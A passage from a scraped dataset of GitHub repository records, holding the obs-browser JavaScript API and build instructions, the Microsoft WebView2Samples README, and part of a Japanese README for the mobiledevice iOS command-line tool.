obsSceneChanged\n* obsSourceVisibleChanged\n* obsSourceActiveChanged\n* obsStreamingStarting\n* obsStreamingStarted\n* obsStreamingStopping\n* obsStreamingStopped\n* obsRecordingStarting\n* obsRecordingStarted\n* obsRecordingPaused\n* obsRecordingUnpaused\n* obsRecordingStopping\n* obsRecordingStopped\n* obsReplaybufferStarting\n* obsReplaybufferStarted\n* obsReplaybufferSaved\n* obsReplaybufferStopping\n* obsReplaybufferStopped\n* obsVirtualcamStarted\n* obsVirtualcamStopped\n* obsExit\n* [Any custom event emitted via obs-websocket vendor requests]\n\n\n### Control OBS\n#### Get webpage control permissions\nPermissions required: NONE\n```js\n/**\n * @typedef {number} Level - The level of permissions. 0 for NONE, 1 for READ_OBS (OBS data), 2 for READ_USER (User data), 3 for BASIC, 4 for ADVANCED and 5 for ALL\n */\n\n/**\n * @callback LevelCallback\n * @param {Level} level\n */\n\n/**\n * @param {LevelCallback} cb - The callback that receives the current control level.\n */\nwindow.obsstudio.getControlLevel(function (level) {\n console.log(level)\n})\n```\n\n#### Get OBS output status\nPermissions required: READ_OBS\n```js\n/**\n * @typedef {Object} Status\n * @property {boolean} recording - not affected by pause state\n * @property {boolean} recordingPaused\n * @property {boolean} streaming\n * @property {boolean} replaybuffer\n * @property {boolean} virtualcam\n */\n\n/**\n * @callback StatusCallback\n * @param {Status} status\n */\n\n/**\n * @param {StatusCallback} cb - The callback that receives the current output status of OBS.\n */\nwindow.obsstudio.getStatus(function (status) {\n\tconsole.log(status)\n})\n```\n\n#### Get the current scene\nPermissions required: READ_USER\n```js\n/**\n * @typedef {Object} Scene\n * @property {string} name - name of the scene\n * @property {number} width - width of the scene\n * @property {number} height - height of the scene\n */\n\n/**\n * @callback SceneCallback\n * @param {Scene} scene\n */\n\n/**\n * @param {SceneCallback} cb - The callback that receives the current scene in OBS.\n */\nwindow.obsstudio.getCurrentScene(function(scene) {\n console.log(scene)\n})\n```\n\n#### Get scenes\nPermissions required: READ_USER\n```js\n/**\n * @callback ScenesCallback\n * @param {string[]} scenes\n */\n\n/**\n * @param {ScenesCallback} cb - The callback that receives the scenes.\n */\nwindow.obsstudio.getScenes(function (scenes) {\n console.log(scenes)\n})\n```\n\n#### Get transitions\nPermissions required: READ_USER\n```js\n/**\n * @callback TransitionsCallback\n * @param {string[]} transitions\n */\n\n/**\n * @param {TransitionsCallback} cb - The callback that receives the transitions.\n */\nwindow.obsstudio.getTransitions(function (transitions) {\n console.log(transitions)\n})\n```\n\n#### Get current transition\nPermissions required: READ_USER\n```js\n/**\n * @callback TransitionCallback\n * @param {string} transition\n */\n\n/**\n * @param {TransitionCallback} cb - The callback that receives the transition currently set.\n */\nwindow.obsstudio.getCurrentTransition(function (transition) {\n console.log(transition)\n})\n```\n\n#### Save the Replay Buffer\nPermissions required: BASIC\n```js\n/**\n * Does not accept any parameters and does not return anything\n */\nwindow.obsstudio.saveReplayBuffer()\n```\n\n#### Start the Replay Buffer\nPermissions required: ADVANCED\n```js\n/**\n * Does not accept any parameters and does not return anything\n */\nwindow.obsstudio.startReplayBuffer()\n```\n\n#### Stop the Replay Buffer\nPermissions required: ADVANCED\n```js\n/**\n * Does not accept any parameters and does not return anything\n */\nwindow.obsstudio.stopReplayBuffer()\n```\n\n#### Change scene\nPermissions required: ADVANCED\n```js\n/**\n * @param {string} name - Name of the scene\n */\nwindow.obsstudio.setCurrentScene(name)\n```\n\n#### Set the current transition\nPermissions required: ADVANCED\n```js\n/**\n * @param {string} name - Name of the transition\n */\nwindow.obsstudio.setCurrentTransition(name)\n```\n\n#### Start streaming\nPermissions required: ALL\n```js\n/**\n * Does not accept any parameters and does not return anything\n */\nwindow.obsstudio.startStreaming()\n```\n\n#### Stop streaming\nPermissions required: ALL\n```js\n/**\n * Does not accept any parameters and does not return anything\n */\nwindow.obsstudio.stopStreaming()\n```\n\n#### Start recording\nPermissions required: ALL\n```js\n/**\n * Does not accept any parameters and does not return anything\n */\nwindow.obsstudio.startRecording()\n```\n\n#### Stop recording\nPermissions required: ALL\n```js\n/**\n * Does not accept any parameters and does not return anything\n */\nwindow.obsstudio.stopRecording()\n```\n\n#### Pause recording\nPermissions required: ALL\n```js\n/**\n * Does not accept any parameters and does not return anything\n */\nwindow.obsstudio.pauseRecording()\n```\n\n#### Unpause recording\nPermissions required: ALL\n```js\n/**\n * Does not accept any parameters and does not return anything\n */\nwindow.obsstudio.unpauseRecording()\n```\n\n#### Start the Virtual Camera\nPermissions required: ALL\n```js\n/**\n * Does not accept any parameters and does not return anything\n */\nwindow.obsstudio.startVirtualcam()\n```\n\n#### Stop the Virtual Camera\nPermissions required: ALL\n```js\n/**\n * Does not accept any parameters and does not return anything\n */\nwindow.obsstudio.stopVirtualcam()\n```\n\n\n### Register for visibility callbacks\n\n**This method is legacy. Register an event listener instead.**\n\n```js\n/**\n * onVisibilityChange gets callbacks when the visibility of the browser source changes in OBS\n *\n * @deprecated\n * @see obsSourceVisibleChanged\n * @param {boolean} visibility - True -> visible, False -> hidden\n */\nwindow.obsstudio.onVisibilityChange = function(visibility) {\n\n};\n```\n\n### Register for active/inactive callbacks\n\n**This method is legacy. Register an event listener instead.**\n\n```js\n/**\n * onActiveChange gets callbacks when the active/inactive state of the browser source changes in OBS\n *\n * @deprecated\n * @see obsSourceActiveChanged\n * @param {bool} True -> active, False -> inactive\n */\nwindow.obsstudio.onActiveChange = function(active) {\n\n};\n```\n\n### obs-websocket Vendor\nobs-browser includes integration with obs-websocket's Vendor requests. The vendor name to use is `obs-browser`, and available requests are:\n\n- `emit_event` - Takes `event_name` and ?`event_data` parameters. Emits a custom event to all browser sources. To subscribe to events, see [here](#register-for-event-callbacks)\n - See [#340](https://github.com/obsproject/obs-browser/pull/340) for example usage.\n\nThere are no available vendor events at this time.\n\n## Building\n\nOBS Browser cannot be built standalone. It is built as part of OBS Studio.\n\nBy following the instructions, this will enable Browser Source & Custom Browser Docks on all three platforms. Both `BUILD_BROWSER` and `CEF_ROOT_DIR` are required.\n\n### On Windows\n\nFollow the [build instructions](https://obsproject.com/wiki/Install-Instructions#windows-build-directions) and be sure to download the **CEF Wrapper** and set `CEF_ROOT_DIR` in CMake to point to the extracted wrapper.\n\n### On macOS\n\nUse the [macOS Full Build Script](https://obsproject.com/wiki/Install-Instructions#macos-build-directions). This will automatically download & enable OBS Browser.\n\n### On Linux\n\nFollow the [build instructions](https://obsproject.com/wiki/Install-Instructions#linux-build-directions) and choose the \"If building with browser source\" option. This includes steps to download/extract the CEF Wrapper, and set the required CMake variables.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "MicrosoftEdge/WebView2Samples", "link": "https://github.com/MicrosoftEdge/WebView2Samples", "tags": [], "stars": 641, "description": "Microsoft Edge WebView2 samples", "lang": "C++", "repo_lang": "", "readme": "# WebView2 Samples\n\nWelcome to the WebView2Samples repo. This repo contains several types of samples for [WebView2](https://learn.microsoft.com/microsoft-edge/webview2/):\n\n* Getting Started tutorial projects - Completed Visual Studio projects that result from following the steps in the [Getting Started tutorials](https://learn.microsoft.com/microsoft-edge/webview2/get-started/get-started). These are like Hello World basic apps.\n\n* Sample apps - WebView2 sample apps for various frameworks and platforms, as Visual Studio projects. These samples have menus and demonstrate various APIs. For more information, see [Sample apps](https://learn.microsoft.com/microsoft-edge/webview2/code-samples-links).\n\n* Deployment samples - Samples that demonstrate deploying the WebView2 Runtime. For more information, see [Deployment samples](https://learn.microsoft.com/microsoft-edge/webview2/samples/deployment-samples).\n\n\n## Contributing\n\nThis project welcomes contributions and suggestions. Most contributions require you to agree to a\nContributor License Agreement (CLA) declaring that you have the right to, and actually do, grant us\nthe rights to use your contribution. For details, visit https://cla.opensource.microsoft.com.\n\nWhen you submit a pull request, a CLA bot will automatically determine whether you need to provide\na CLA and decorate the PR appropriately (e.g., status check, comment). Simply follow the instructions\nprovided by the bot. You will only need to do this once across all repos using our CLA.\n\nThis project has adopted the [Microsoft Open Source Code of Conduct](https://opensource.microsoft.com/codeofconduct/).\nFor more information see the [Code of Conduct FAQ](https://opensource.microsoft.com/codeofconduct/faq/) or\ncontact [opencode@microsoft.com](mailto:opencode@microsoft.com) with any additional questions or comments.\n\n\n## Trademarks\n\nThis project may contain trademarks or logos for projects, products, or services. Authorized use of Microsoft \ntrademarks or logos is subject to and must follow \n[Microsoft Trademark and Brand Guidelines](https://www.microsoft.com/en-us/legal/intellectualproperty/trademarks/usage/general).\nUse of Microsoft trademarks or logos in modified versions of this project must not cause confusion or imply Microsoft sponsorship.\nAny use of third-party trademarks or logos are subject to those third-party's policies.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "imkira/mobiledevice", "link": "https://github.com/imkira/mobiledevice", "tags": [], "stars": 640, "description": "Command line utility for interacting with Apple's Private (Closed) Mobile Device Framework", "lang": "C++", "repo_lang": "", "readme": "[mobiledevice\u30d7\u30ed\u30b8\u30a7\u30af\u30c8\u30da\u30fc\u30b8\u3078](https://github.com/imkira/mobiledevice)\n\nmobiledevice\n============\n\n[![Build Status](https://travis-ci.org/imkira/mobiledevice.png)](https://travis-ci.org/imkira/mobiledevice)\n\nmobiledevice\u306fApple\u306eMobile Device\u30d5\u30ec\u30fc\u30e0\u30ef\u30fc\u30af\u3068\u76f8\u4e92\u306b\u4f7f\u7528\u3059\u308b\u30b3\u30de\u30f3\u30c9\u30e9\u30a4\u30f3\u30c4\u30fc\u30eb\u3067\u3042\u308b\u3002\nXcode\u3084iTunes\u306b\u983c\u3089\u305a\u3001\u30b3\u30de\u30f3\u30c9\u30e9\u30a4\u30f3\u304b\u3089\u30a2\u30d7\u30ea\u3092\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3057\u305f\u308a\u30a2\u30f3\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3057\u305f\u308a\u3059\u308b\u306e\u304c\u51fa\u6765\u308b\u306e\u3067\u305d\u306e\u3088\u3046\u306a\u4f5c\u696d\u306f\u81ea\u52d5\u5316\u53ef\u80fd\u3068\u306a\u308b\u3002\n\u666e\u901a\u306ejailbroken\u7aef\u672b\u3067\u306f\u306a\u304f\u3066\u3082\u5927\u4e08\u592b\uff01\n\n## \u5fc5\u8981\u306a\u3082\u306e\n\n* iPhone 3G\u4ee5\u964d\u306e\u7aef\u672b or iPad\uff08iPhone 4, 5, 6\u3067\u78ba\u8a8d\u3057\u305f\uff09\u3002\n* iPhone or iPad\u3092USB\u3067Mac\u306b\u63a5\u7d9a\u3059\u308b\u3002\n* \u30a2\u30d7\u30ea\u3092\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3059\u308b\u306b\u306f\u3001\u3042\u3089\u304b\u3058\u3081\u306biOS\u958b\u767a\u8a3c\u660e\u66f8\u3092\u7aef\u672b\u306b\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3059\u308b\u3002\n* Mac OS X 10.6\u4ee5\u964d\u3002\n* XCode 3\u4ee5\u964d \u3068 iOS SDK\u3092\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3059\u308b\u3002\n* \u672c\u30c4\u30fc\u30eb\u3092\u30b3\u30a4\u30f3\u30d1\u30a4\u30eb\u3059\u308b\uff08\u4efb\u610f\u3060\u304c\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3082\u53ef\u80fd\uff09\u3002\n\n### \u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\n\n### Homebrew\n\n[homebrew](http://brew.sh)\n\u3092\u4f7f\u7528\u3059\u308b\u5834\u5408\u3001\u30bf\u30fc\u30df\u30ca\u30eb\u3092\u958b\u3044\u3066\u4e0b\u8a18\u30b3\u30de\u30f3\u30c9\u3092\u5b9f\u884c\u3059\u308b\uff1a\n\n```shell\nbrew update\nbrew install mobiledevice\n```\n\n### \u624b\u52d5\n\nmobiledevice\u3092\u30b3\u30f3\u30d1\u30a4\u30eb\u3059\u308b\u306b\u306f\u3001\u30bf\u30fc\u30df\u30ca\u30eb\u3092\u958b\u3044\u3066\u4e0b\u8a18\u30b3\u30de\u30f3\u30c9\u3092\u5b9f\u884c\u3059\u308b\uff1a\n\n```shell\ngit clone git://github.com/imkira/mobiledevice.git\ncd mobiledevice\nmake\n```\n\n\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3059\u308b\u306b\u306f\u4e0b\u8a18\u30b3\u30de\u30f3\u30c9\u3082\u5165\u529b\u3059\u308b\uff1a\n\n```shell\nmake install\n```\n\n## \u4f7f\u3044\u65b9\n\n### \u30d8\u30eb\u30d7\n\n\u30b3\u30f3\u30d1\u30a4\u30eb\u3068\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\uff08\u4efb\u610f\uff09\u3057\u305f\u5f8c\u306b\u3001\u30bf\u30fc\u30df\u30ca\u30eb\u3092\u958b\u304f\u3002\n\n\u4e0b\u8a18\u306e\u3088\u3046\u306bmobiledevice\u3092\u5b9f\u884c\u3059\u308b\u3068\u3001\n\n```shell\nmobiledevice help\n```\n\n\u4e0b\u8a18\u306e\u901a\u308a\u3001\u57fa\u672c\u4f7f\u3044\u65b9\u306e\u8aac\u660e\u753b\u9762\u3092\u78ba\u8a8d\u3067\u304d\u308b(\u82f1\u8a9e\u306e\u307f)\u3002\n\n```\nmobiledevice help\n Display this help screen\n\nmobiledevice version [options]\n Display program version.\n Options:\n -r: Include revision identifier\n\nmobiledevice list_devices [options]\n Display UDID of each connected devices.\n Options:\n -t : Timeout (in ms) to wait for devices (default: 1)\n -n : Limit the number of devices to be printed\n\nmobiledevice list_device_props [options]\n List all property names of device.\n Options:\n -u : Filter by device UDID (default: first detected device)\n -t : Timeout (in ms) to wait for devices (default: 1)\n\nmobiledevice get_device_prop [options] \n Display value of device property with given name.\n Options:\n -u : Filter by device UDID (default: first detected device)\n -t : Timeout (in ms) to wait for devices (default: 1)\n\nmobiledevice list_apps [options]\n Lists all apps installed on device\n Options:\n -u : Filter by device UDID (default: first detected device)\n -t : Timeout (in ms) to wait for devices (default: 1)\n\nmobiledevice list_app_props [options] \n List all property names of app with given bundle id.\n Options:\n -u : Filter by device UDID (default: first detected device)\n -t : Timeout (in ms) to wait for devices (default: 1)\n\nmobiledevice get_app_prop [options] \n Display value of app property with given name.\n Options:\n -u : Filter by device UDID (default: first detected device)\n -t : Timeout (in ms) to wait for devices (default: 1)\n\nmobiledevice install_app [options] \n Install app (.app folder) to device\n Options:\n -u : Filter by device UDID (default: first detected device)\n -t : Timeout (in ms) to wait for devices (default: 1)\n\nmobiledevice uninstall_app [options] \n Uninstall app with given bundle id from device\n Options:\n -u : Filter by device UDID (default: first detected device)\n -t : Timeout (in ms) to wait for devices (default: 1)\n\nmobiledevice tunnel [options] \n Forward TCP connections to connected device\n Options:\n -u : Filter by device UDID (default: first detected device)\n -t : Timeout (in ms) to wait for devices (default: 1)\n\nmobiledevice get_bundle_id \n Display bundle identifier of app (.app folder)\n```\n\n\u4e0a\u8a18\u30b3\u30de\u30f3\u30c9\u306e\u5b9f\u884c\u306b\u5931\u6557\u3057\u305f\u5834\u5408\u3001\u305d\u306e\u30d7\u30ed\u30bb\u30b9\u304c\u300c0\u300d\u3068\u3044\u3046status\u4ee5\u5916\u306e\u5024\u3067\u5fc5\u305a\u7d42\u4e86\u3059\u308b\u3002\n\u307e\u305f\u3001\u767a\u751f\u3057\u305f\u30a8\u30e9\u30fc\u6b21\u7b2cstderr\u306b\u305d\u306e\u5185\u5bb9\u304c\u51fa\u529b\u3055\u308c\u308b\u3053\u3068\u304c\u3042\u308b\u3002\n\n\u5b9f\u884c\u306b\u6210\u529f\u3057\u305f\u5834\u5408\u3001\u305d\u306e\u30d7\u30ed\u30bb\u30b9\u304c\u300c0\u300d\u3068\u3044\u3046status\u306e\u5024\u3067\u5fc5\u305a\u7d42\u4e86\u3059\u308b\u3002\n\n### \u7aef\u672b\u4e00\u89a7\u3092\u53d6\u5f97\u3059\u308b\n\n\u63a5\u7d9a\u4e2d\u306e\u7aef\u672b\u306e\u4e00\u89a7\u3092\u51fa\u529b\u3059\u308b\u306b\u306f\u3001\u4e0b\u8a18\u306e\u3088\u3046\u306b\u5b9f\u884c\u3059\u308b\u3002\n\n```\nmobiledevice list_devices\n```\n\n\u5185\u5bb9\u306f\u4e0b\u8a18\u306e\u3088\u3046\u306a\u3082\u306e\u3067\u3042\u308b\u3002\n\n```\naaf4c61ddcc5e8a2dabede0f3b482cd9aea9434d\n7c211433f02071597741e6ff5a8ea34789abbf43\n0ab8318acaf6e678dd02e2b5c343ed41111b393d\n```\n\n\u4e0a\u8a18\u4e00\u89a7\u3067\u306f\u3001\u7aef\u672b\u304c\uff13\u3064\u63a5\u7d9a\u3055\u308c\u3066\u3044\u308b\u3053\u3068\u304c\u5206\u304b\u308b\u3002\n\u4e00\u89a7\u3092\u4f55\u4ef6\u307e\u3067\u5236\u9650\u3059\u308b\u306b\u306f\u3001```-n ```\u30d5\u30e9\u30b0\u3092\u4f7f\u3063\u3066\u4e0b\u8a18\u306e\u3088\u3046\u306b\u5b9f\u884c\u3059\u308b\u3002\n\n```\nmobiledevice list_devices -n 1\n```\n\n\u5185\u5bb9\u306f\u4e0b\u8a18\u306e\u3088\u3046\u306a\u3082\u306e\u3067\u3042\u308b\u3002\n\n```\naaf4c61ddcc5e8a2dabede0f3b482cd9aea9434d\n```\n\n### \u7aef\u672b\u306e\u30d7\u30ed\u30d1\u30c6\u30a3\u540d\u4e00\u89a7\u3092\u53d6\u5f97\u3059\u308b\n\n\u7aef\u672b\u306e\u30d7\u30ed\u30d1\u30c6\u30a3\u540d\u4e00\u89a7\u3092\u51fa\u529b\u3059\u308b\u306b\u306f\u3001\u4e0b\u8a18\u306e\u3088\u3046\u306b\u5b9f\u884c\u3059\u308b\u3002\n\n```\nmobiledevice list_device_props\n```\n\n\u5185\u5bb9\u306f\u4e0b\u8a18\u306e\u3088\u3046\u306a\u3082\u306e\u3067\u3042\u308b\u3002\n\n```\nActivationPublicKey\nActivationState\nActivationStateAcknowledged\nBasebandSerialNumber\nBasebandStatus\nBasebandVersion\nBluetoothAddress\nBuildVersion\nCPUArchitecture\nDeviceCertificate\nDeviceClass\nDeviceColor\nDeviceName\nDevicePublicKey\nDieID\n...\n```\n\n\u7aef\u672b\u3092\u7279\u5b9a\u3059\u308b\u306b\u306f\u3001```-u ```\u30d5\u30e9\u30b0\u3092\u8db3\u3057\u3066\u30b3\u30de\u30f3\u30c9\u3092\u4e0b\u8a18\u306e\u3088\u3046\u306b\u5b9f\u884c\u3059\u308b\u3002\n\n```\nmobiledevice list_device_props -u 7c211433f02071597741e6ff5a8ea34789abbf43\n```\n\n\u6ce8\u610f\u70b9\uff1a\n\n* ```-u ```\u30d5\u30e9\u30b0\u3092\u6307\u5b9a\u3057\u306a\u3044\u5834\u5408\u3001\u6700\u521d\u306b\u691c\u77e5\u3055\u308c\u305f\u7aef\u672b\u304c\u4f7f\u7528\u3055\u308c\u308b\u3002\n\n### \u7aef\u672b\u306e\u30d7\u30ed\u30d1\u30c6\u30a3\u306e\u5024\u3092\u53d6\u5f97\u3059\u308b\n\n\u7aef\u672b\u306e\u30d7\u30ed\u30d1\u30c6\u30a3\u306e\u5024\u3092\u51fa\u529b\u3059\u308b\u306b\u306f\u3001\u4e0b\u8a18\u306e\u3088\u3046\u306b\u5b9f\u884c\u3059\u308b\u3002\n\n```\nmobiledevice get_device_prop property_name\n```\n\n\u4f8b\u3048\u3070\u3001\u7aef\u672b\u306e\u88fd\u54c1\u30bf\u30a4\u30d7\u3092\u53d6\u5f97\u3059\u308b\u306b\u306f\u3001\u4e0b\u8a18\u306e\u3088\u3046\u306b```ProductType```\u3068\u3044\u3046\u30d7\u30ed\u30d1\u30c6\u30a3\u540d\u3092\u6307\u5b9a\u3057\u3066\u5b9f\u884c\u3059\u308b\u3002\n\n```\nmobiledevice get_device_prop ProductType\n```\n\n\u7aef\u672b\u3092\u7279\u5b9a\u3059\u308b\u306b\u306f\u3001```-u ```\u30d5\u30e9\u30b0\u3092\u8db3\u3057\u3066\u30b3\u30de\u30f3\u30c9\u3092\u4e0b\u8a18\u306e\u3088\u3046\u306b\u5b9f\u884c\u3059\u308b\u3002\n\n```\nmobiledevice get_device_prop -u 7c211433f02071597741e6ff5a8ea34789abbf43\nproperty_name\n```\n\n\u6ce8\u610f\u70b9\uff1a\n\n* ```-u ```\u30d5\u30e9\u30b0\u3092\u6307\u5b9a\u3057\u306a\u3044\u5834\u5408\u3001\u6700\u521d\u306b\u691c\u77e5\u3055\u308c\u305f\u7aef\u672b\u304c\u4f7f\u7528\u3055\u308c\u308b\u3002\n* \u5b9f\u884c\u6210\u529f\u306e\u5834\u5408\u3001\u51fa\u529b\u5185\u5bb9\u304c\u6539\u884c\u6587\u5b57\u3092\u8db3\u3057\u3066\u51fa\u529b\u3055\u308c\u308b\u3002\n\n### \u30a2\u30d7\u30ea\u4e00\u89a7\u3092\u53d6\u5f97\u3059\u308b\n\n\u7aef\u672b\u306b\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3055\u308c\u3066\u3044\u308b\u30a2\u30d7\u30ea\u306e\u4e00\u89a7\u3092\u51fa\u529b\u3059\u308b\u306b\u306f\u3001\u4e0b\u8a18\u30b3\u30de\u30f3\u30c9\u3092\u5b9f\u884c\u3059\u308b\u3002\n\n```\nmobiledevice list_apps\n```\n\n\u5185\u5bb9\u306f\u4e0b\u8a18\u306e\u3088\u3046\u306a\u3082\u306e\u3067\u3042\u308b\u3002\n\n```\ncom.apple.VoiceMemos\ncom.apple.mobiletimer\ncom.apple.AdSheetPhone\ncom.apple.weather\ncom.apple.iphoneos.iPodOut\ncom.apple.mobilesafari\ncom.apple.Preferences\n...\ncom.mycompany.myapp1\ncom.mycompany.myapp2\n...\n```\n\n\u7aef\u672b\u3092\u7279\u5b9a\u3059\u308b\u306b\u306f\u3001```-u ```\u30d5\u30e9\u30b0\u3092\u8db3\u3057\u3066\u30b3\u30de\u30f3\u30c9\u3092\u4e0b\u8a18\u306e\u3088\u3046\u306b\u5b9f\u884c\u3059\u308b\u3002\n\n```\nmobiledevice list_apps -u 7c211433f02071597741e6ff5a8ea34789abbf43\n```\n\n\u6ce8\u610f\u70b9\uff1a\n\n* ```-u ```\u30d5\u30e9\u30b0\u3092\u6307\u5b9a\u3057\u306a\u3044\u5834\u5408\u3001\u6700\u521d\u306b\u691c\u77e5\u3055\u308c\u305f\u7aef\u672b\u304c\u4f7f\u7528\u3055\u308c\u308b\u3002\n\n### \u30a2\u30d7\u30ea\u306e\u30d7\u30ed\u30d1\u30c6\u30a3\u540d\u4e00\u89a7\u3092\u53d6\u5f97\u3059\u308b\n\n\u7aef\u672b\u306b\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3055\u308c\u3066\u3044\u308b\u30a2\u30d7\u30ea\u306e\u30d7\u30ed\u30d1\u30c6\u30a3\u540d\u4e00\u89a7\u3092\u51fa\u529b\u3059\u308b\u306b\u306f\u3001\u30a2\u30d7\u30ea\u306ebundle identifier\u3092\u6307\u5b9a\u3057\u3066\u4e0b\u8a18\u306e\u3088\u3046\u306b\u5b9f\u884c\u3059\u308b\u3002\n\n```\nmobiledevice list_app_props com.mycompany.myapp\n```\n\n\u5185\u5bb9\u306f\u4e0b\u8a18\u306e\u3088\u3046\u306a\u3082\u306e\u3067\u3042\u308b\u3002\n\n```\nSBIconClass\nCFBundleInfoDictionaryVersion\nEntitlements\nDTPlatformVersion\nCFBundleName\nDTSDKName\nApplicationType\nUIViewControllerBasedStatusBarAppearance\nCFBundleIcons\nUIStatusBarStyle\nContainer\nLSRequiresIPhoneOS\nCFBundleDisplayName\nPrivateURLSchemes\nUIBackgroundModes\nDTSDKBuild\n...\n```\n\n\u7aef\u672b\u3092\u7279\u5b9a\u3059\u308b\u306b\u306f\u3001```-u ```\u30d5\u30e9\u30b0\u3092\u8db3\u3057\u3066\u30b3\u30de\u30f3\u30c9\u3092\u4e0b\u8a18\u306e\u3088\u3046\u306b\u5b9f\u884c\u3059\u308b\u3002\n\n```\nmobiledevice list_app_props -u 7c211433f02071597741e6ff5a8ea34789abbf43\n```\n\n\u6ce8\u610f\u70b9\uff1a\n\n* ```-u ```\u30d5\u30e9\u30b0\u3092\u6307\u5b9a\u3057\u306a\u3044\u5834\u5408\u3001\u6700\u521d\u306b\u691c\u77e5\u3055\u308c\u305f\u7aef\u672b\u304c\u4f7f\u7528\u3055\u308c\u308b\u3002\n\n### \u30a2\u30d7\u30ea\u306e\u30d7\u30ed\u30d1\u30c6\u30a3\u306e\u5024\u3092\u53d6\u5f97\u3059\u308b\n\n\u7aef\u672b\u306b\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3055\u308c\u3066\u3044\u308b\u30a2\u30d7\u30ea\u306e\u30d7\u30ed\u30d1\u30c6\u30a3\u306e\u5024\u3092\u51fa\u529b\u3059\u308b\u306b\u306f\u3001\u30a2\u30d7\u30ea\u306ebundle identifier\u3068\u30d7\u30ed\u30d1\u30c6\u30a3\u540d\u3092\u6307\u5b9a\u3057\u3066\u4e0b\u8a18\u306e\u3088\u3046\u306b\u5b9f\u884c\u3059\u308b\u3002\n\n```\nmobiledevice get_app_prop com.mycompany.myapp property_name\n```\n\n\u4f8b\u3048\u3070\u3001Apple\u306e\u300c\u5929\u6c17\u300d\u30a2\u30d7\u30ea\u304c\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3055\u308c\u3066\u3044\u308b\u7aef\u672b\u4e0a\u306e\u30d1\u30b9\u3092\u53d6\u5f97\u3059\u308b\u306b\u306f\u3001\u4e0b\u8a18\u306e\u3088\u3046\u306b```Path```\u3068\u3044\u3046\u30d7\u30ed\u30d1\u30c6\u30a3\u540d\u3092\u6307\u5b9a\u3057\u3066\u5b9f\u884c\u3059\u308b\u3002\n\n```\nmobiledevice get_app_prop com.apple.weather Path\n```\n\n\u7aef\u672b\u3092\u7279\u5b9a\u3059\u308b\u306b\u306f\u3001```-u ```\u30d5\u30e9\u30b0\u3092\u8db3\u3057\u3066\u30b3\u30de\u30f3\u30c9\u3092\u4e0b\u8a18\u306e\u3088\u3046\u306b\u5b9f\u884c\u3059\u308b\u3002\n\n```\nmobiledevice get_app_prop -u 7c211433f02071597741e6ff5a8ea34789abbf43 com.mycompany.myapp Path\n```\n\n\u6ce8\u610f\u70b9\uff1a\n\n* ```-u ```\u30d5\u30e9\u30b0\u3092\u6307\u5b9a\u3057\u306a\u3044\u5834\u5408\u3001\u6700\u521d\u306b\u691c\u77e5\u3055\u308c\u305f\u7aef\u672b\u304c\u4f7f\u7528\u3055\u308c\u308b\u3002\n* \u5b9f\u884c\u6210\u529f\u306e\u5834\u5408\u3001\u51fa\u529b\u5185\u5bb9\u304c\u6539\u884c\u6587\u5b57\u3092\u8db3\u3057\u3066\u51fa\u529b\u3055\u308c\u308b\u3002\n\n### \u30a2\u30d7\u30ea\u3092\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3059\u308b\n\n\u7aef\u672b\u306b\u30a2\u30d7\u30ea\u3092\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3059\u308b\u306b\u306f\u4e0b\u8a18\u30b3\u30de\u30f3\u30c9\u3092\u5b9f\u884c\u3059\u308b\u3002\n\n```\nmobiledevice install_app path/to/my_application.app\n```\n\n\u7aef\u672b\u3092\u7279\u5b9a\u3059\u308b\u306b\u306f\u3001```-u ```\u30d5\u30e9\u30b0\u3092\u8db3\u3057\u3066\u30b3\u30de\u30f3\u30c9\u3092\u4e0b\u8a18\u306e\u3088\u3046\u306b\u5b9f\u884c\u3059\u308b\u3002\n\n```\nmobiledevice install_app -u 7c211433f02071597741e6ff5a8ea34789abbf43 path/to/my_application.app\n```\n\n\u6ce8\u610f\u70b9\uff1a\n\n* ```-u ```\u30d5\u30e9\u30b0\u3092\u6307\u5b9a\u3057\u306a\u3044\u5834\u5408\u3001\u6700\u521d\u306b\u691c\u77e5\u3055\u308c\u305f\u7aef\u672b\u304c\u4f7f\u7528\u3055\u308c\u308b\u3002\n\n### \u30a2\u30d7\u30ea\u3092\u30a2\u30f3\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3059\u308b\n\n\u7aef\u672b\u304b\u3089\u3001\u30a2\u30d7\u30ea\u3092\u30a2\u30f3\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3059\u308b\u306b\u306f\u4e0b\u8a18\u306e\u3088\u3046\u306b\u305d\u306e\u30a2\u30d7\u30ea\u306ebundle identifier\u3092\u6307\u5b9a\u3057\u3066\u4e0b\u8a18\u30b3\u30de\u30f3\u30c9\u3092\u5b9f\u884c\u3059\u308b\u3002\n\n```\nmobiledevice uninstall_app com.mycompany.myapp\n```\n\n\u7aef\u672b\u3092\u7279\u5b9a\u3059\u308b\u306b\u306f\u3001```-u ```\u30d5\u30e9\u30b0\u3092\u8db3\u3057\u3066\u30b3\u30de\u30f3\u30c9\u3092\u4e0b\u8a18\u306e\u3088\u3046\u306b\u5b9f\u884c\u3059\u308b\u3002\n\n```\nmobiledevice uninstall_app -u 7c211433f02071597741e6ff5a8ea34789abbf43 com.mycompany.myapp\n```\n\n\u6ce8\u610f\u70b9\uff1a\n\n* ```-u ```\u30d5\u30e9\u30b0\u3092\u6307\u5b9a\u3057\u306a\u3044\u5834\u5408\u3001\u6700\u521d\u306b\u691c\u77e5\u3055\u308c\u305f\u7aef\u672b\u304c\u4f7f\u7528\u3055\u308c\u308b\u3002\n\n### 